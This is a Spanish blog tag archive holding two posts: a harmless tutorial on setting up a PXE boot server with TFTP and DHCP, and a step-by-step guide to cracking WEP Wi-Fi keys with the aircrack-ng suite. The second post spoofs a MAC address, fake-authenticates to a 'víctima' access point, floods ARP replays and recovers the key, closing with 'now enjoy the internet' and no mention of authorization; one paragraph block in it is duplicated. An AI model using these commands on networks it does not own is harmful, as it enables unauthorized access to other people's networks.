Archivo de la etiqueta: linux

Configurar PXE linux


PXE hace referencia al entorno de ejecución de prearranque (Preboot eXecution Environment). Es un entorno para arrancar e instalar el sistema operativo en ordenadores a través de una red, de manera independiente de los dispositivos de almacenamiento de datos disponibles (como discos duros) o de los sistemas operativos instalados.

PXE fue introducido como parte del framework Wired for Management por Intel y fue descrito en la especificación (version 2.1) publicada por Intel y Systemsoft el 20 de septiembre de 1999. PXE utiliza varios protocolos de red como IPUDPDHCPTFTP, y conceptos como Globally Unique Identifier (GUID), Universally Unique Identifier (UUID) y Universal Network Device Interface (UNDI).

El término cliente PXE sólo se refiere al papel que la máquina juega en el proceso de arranque mediante PXE. Un cliente PXE puede ser un servidor, un ordenador de mesa, portátil o cualquier otra máquina que esté equipada con código de arranque PXE.

Instalación:

Escribimos la comanda de instalación

#aptitude install netkit-inetd tftpd-hpa dhcp3-server lftp

escribiremos esta comanda para ver si el servicio tftp esta ok

#netstat -uap | grep tftp

Si podemos ver esto así es que está correcto

server1:~# netstat -uap | grep tftp
udp        0      0 *:tftp                  *:*                                 2242/inetd
server1:~#

Si no fue lo que apareció mala suerte, es broma entonces plan “b”, deberemos editar el siguiente archivo /etc/inetd.conf y poner lo siguiente:

[…]

#:BOOT: TFTP service is provided primarily for booting.  Most sites

#       run this only on machines acting as “boot servers.”

tftp           dgram   udp     wait    root  /usr/sbin/in.tftpd /usr/sbin/in.tftpd -s /var/lib/tftpboot

[…]

y reiniciamos el demonio(servicio):

/etc/init.d/openbsd-inetd restart

Lo que hicimos en el paso anterior fue instalar el servicio TFTP ahora instalaremos y configuraremos el servicio DHCP a que mola, venga vamos allá:

DHCP:

hay que ir al archivo /etc/dhcp3/dhcpd.conf y editarlo poniendo esto:

option domain-name-servers 145.253.2.75, 213.191.92.86;

default-lease-time 86400;

max-lease-time 604800;

authoritative;

subnet 192.168.0.0 netmask 255.255.255.0 {

range 192.168.0.10 192.168.0.49;

option subnet-mask 255.255.255.0;

option broadcast-address 192.168.0.255;

option routers 192.168.0.1;

filename “pxelinux.0”;

next-server 192.168.0.100;

}

Basicamente hay que modificar desde donde pone subnet las ip para adaptarlas a tu maquina.

En next-server debes poner la ip del servidor PXE reiniciamos el demonio /etc/init.d/dhcp3-server restart

Bueno ahora solo hay que poner imagenes de distros para que nuestro PXE tenga algo de sentido:

poned estas comandas para bajarse una imagen de debian por ejemplo:

cd /tmp

lftp -c “open http://ftp.de.debian.org/debian/dists/lenny/main/installer-i386/current/images/; mirror netboot/”

mv netboot/* /var/lib/tftpboot

rm -fr netboot

Miramos este archivo cat /var/lib/tftpboot/pxelinux.cfg/default y si vemos esto es que vamos bien:

# D-I config version 1.0

include debian-installer/i386/boot-screens/menu.cfg

default debian-installer/i386/boot-screens/vesamenu.c32

prompt 0

timeout 0

Seguimos poniendo mas distros para poder escoger y tener(Esto es para debian Lenny 64 bits):

mv /var/lib/tftpboot/debian-installer /var/lib/tftpboot/lenny

mkdir /var/lib/tftpboot/debian

mv /var/lib/tftpboot/lenny /var/lib/tftpboot/debian/

mkdir /var/lib/tftpboot/debian/lenny/x86_64

cd /tmp

lftp -c “open http://ftp.de.debian.org/debian/dists/lenny/main/installer-amd64/current/images/; mirror netboot/”

cd /tmp/netboot/debian-installer/

mv amd64/* /var/lib/tftpboot/debian/lenny/x86_64

cd /tmp/

rm -fr netboot/  –>para borrar directorios

Miramos el archivo cat /var/lib/tftpboot/debian/lenny/i386/boot-screens/adtxt.cfg para ver si aparece esto

label expert

menu label ^Expert install

kernel debian-installer/i386/linux

append priority=low vga=normal initrd=debian-installer/i386/initrd.gz —

label rescue

menu label ^Rescue mode

kernel debian-installer/i386/linux

append vga=normal initrd=debian-installer/i386/initrd.gz rescue/enable=true — quiet

label auto

menu label ^Automated install

kernel debian-installer/i386/linux

append auto=true priority=critical vga=normal initrd=debian-installer/i386/initrd.gz — quiet

Miramos otro archivo para ver su configuracion:

cat /var/lib/tftpboot/debian/lenny/i386/boot-screens/txt.cfg

default install

label install

menu label ^Install

menu default

kernel debian-installer/i386/linux

append vga=normal initrd=debian-installer/i386/initrd.gz — quiet

Por ultimo miramos el archivo /var/lib/tftpboot/pxelinux.cfg/default y al final debe haber esto

prompt 1

timeout 0

Si el prompt no está a 1 ponlo.

Y ya está espero que lo disfruteis, si quereis poner mas distros como Ubuntu poned un comentario y lo pondré ok?


 
Etiquetado , , ,

Crackear wifi Aircrack


Aircrack -ng es un programa crackeador de claves 802.11 WEP y WPA/WPA2-PSK.

En primer lugar debemos tener instalado en nuestro sistema el Driver del Fabricante de nuestra tarjeta de red, aircrack-ng no funciona con drivers emulados por ndiswrapper.
Instalando Aircrack-ng
Ubuntu.
$ sudo apt-get install aircrack-ng

Paquetes complementarios.

Una vez instalado aircrack-ng puede ser necesario la instalación de un paquete adicional por lo cual descargaremos IW, que es un complemento para poner nuestra tarjeta inalámbrica en modo monitor. según la distribución será necesario actualizar la librería libnl

$ sudo apt-get install libnl1* (ubuntu, debian)

Instalada y/o actualizada la librería procedemos a descargar iw.

# wget http://wireless.kernel.org/download/iw/iw-0.9.13.tar.bz2

# tar jxvf iw-0.9.13.tar.bz2

# cd iw-0.9.13

# make

#make install

Y de esta forma ya tenemos aircrack-ng y su componente para poner en modo monitor nuestra wireless.

Ahora solo nos queda empezar a crackear.

Crackeando redes.

Ahora empezamos nuestro trabajo, lo que se realizó anteriormente solo se hace una vez, que es para instalar y configurar de buena forma nuestra suite, lo que se realiza siempre es lo que a continuación se detalla.

Para quienes creen que cambiar su mac es necesario, pueden hacerlo asi: macchanger -m 00:11:22:33:44:55 wlan0

Aviso: Las direcciones mac SIEMPRE deben iniciar con 00

Airmon-ng.

Airmon-ng es parte de la suite de aircrack-ng la cual permite crear la interfaz mon0

en modo monitor. Su utilización es la siguiente


# airmon-ng start wlan0 (o el nombre de la interfaz que puede ser wlan0, eth1, etc)


En caso de que nos muestre un error podemos utilizar iw que instalamos anteriormente.

# iw dev wlan0 interface add mon0 type monitor

Ya tenemos el primer paso completo.

Airodump-ng

# airodump-ng mon0

De esta forma veremos todas las redes disponibles con sus respectivos canales, una vez

que ya decidimos que redes son las que vamos a atacar creamos un filtro, paramos la

ejecución de airodump-ng presionando Ctrl + C, y posteriormente ejecutamos:

-c = Filtro de canal 6, 11, 1, etc.

-w = Escribir resultados en un documento.

# airodump-ng -c 11 -w nombre mon0

De esta forma hemos creado un filtro que solo trabajará en el canal indicado (11).

Aireplay-Ng

Una vez que airodump-ng ya está trabajando, abrimos una nueva consola donde

empezaremos a trabajar con aireplay-ng.

Lo primero que debemos hacer con aireplay-ng es asociarnos a la red a la cual

atacaremos.

#aireplay-ng -1 6000 -q 10 -o 1 -e (ESSID victima) -a (Mac Victima) -h

(nuestra mac) mon0

Creo que muchos se pueden preguntar, ¿de donde obtengo el ESSID y la Mac de la

víctima?. Bueno, si recordamos en la consola anterior ejecutamos airodump-ng, de esa

pantalla encontramos las columnas BSSID y ESSID que corresponden a la mac y la

ESSID o nombre del router respectivamente.

De esta forma estaremos asociados a la red la cual cada 10 segundos aireplay-ng

mandará un paquete llamado KEEP-ALIVE , lo que avisará al “ ” router que seguimos

asociados y asi no nos botará a cada rato.

Ya asociados procedemos a enviar y capturar paquetes, para eso en una nueva consola

ejecutaremos nuevamente aireplay-ng pero en modo agresivo.

#aireplay-ng -3 -b (Mac Víctima) -h (nuestra mac) mon0

Creo que muchos se pueden preguntar, ¿de donde obtengo el ESSID y la Mac de la

víctima?. Bueno, si recordamos en la consola anterior ejecutamos airodump-ng, de esa

pantalla encontramos las columnas BSSID y ESSID que corresponden a la mac y la

ESSID o nombre del router respectivamente.

De esta forma estaremos asociados a la red la cual cada 10 segundos aireplay-ng

mandará un paquete llamado KEEP-ALIVE , lo que avisará al “ ” router que seguimos

asociados y asi no nos botará a cada rato.

Ya asociados procedemos a enviar y capturar paquetes, para eso en una nueva consola

ejecutaremos nuevamente aireplay-ng pero en modo agresivo.

#aireplay-ng -3 -b (Mac Víctima) -h (nuestra mac) mon0

De la imagen anterior lo que nos interesa es que aumenten los ARP, ya que son esos los paquetes capturados y los que además nos entregarán la clave buscada.

Una vez que tenemos desde 150.000 paquetes capturados empezamos a trabajar con aircrack-ng.

Nunca está demás recordar que mientras mas paquetes capturados, es mucho mejor, ya que más pronto obtendremos la clave.

Aircrack-Ng

Ya estamos en el paso final, con los paquetes de datos capturados procedemos a ejecutar aircrack-ng, para lo cual tenemos dos formas, una lenta pero efectiva, y una rápida pero se necesita una mayor cantidad de paquetes para desencriptar la clave.

Forma lenta
#aircrack-ng *.cap
Forma Rápida (se necesita mayor cantidad de paquetes capturados)
#aircrack-ng -z *.cap
De esta forma ya hemos desencriptado la clave que buscabamos, ahora a disfrutar de
internet.
Autor:Paolo Norambuena

Etiquetado , , , ,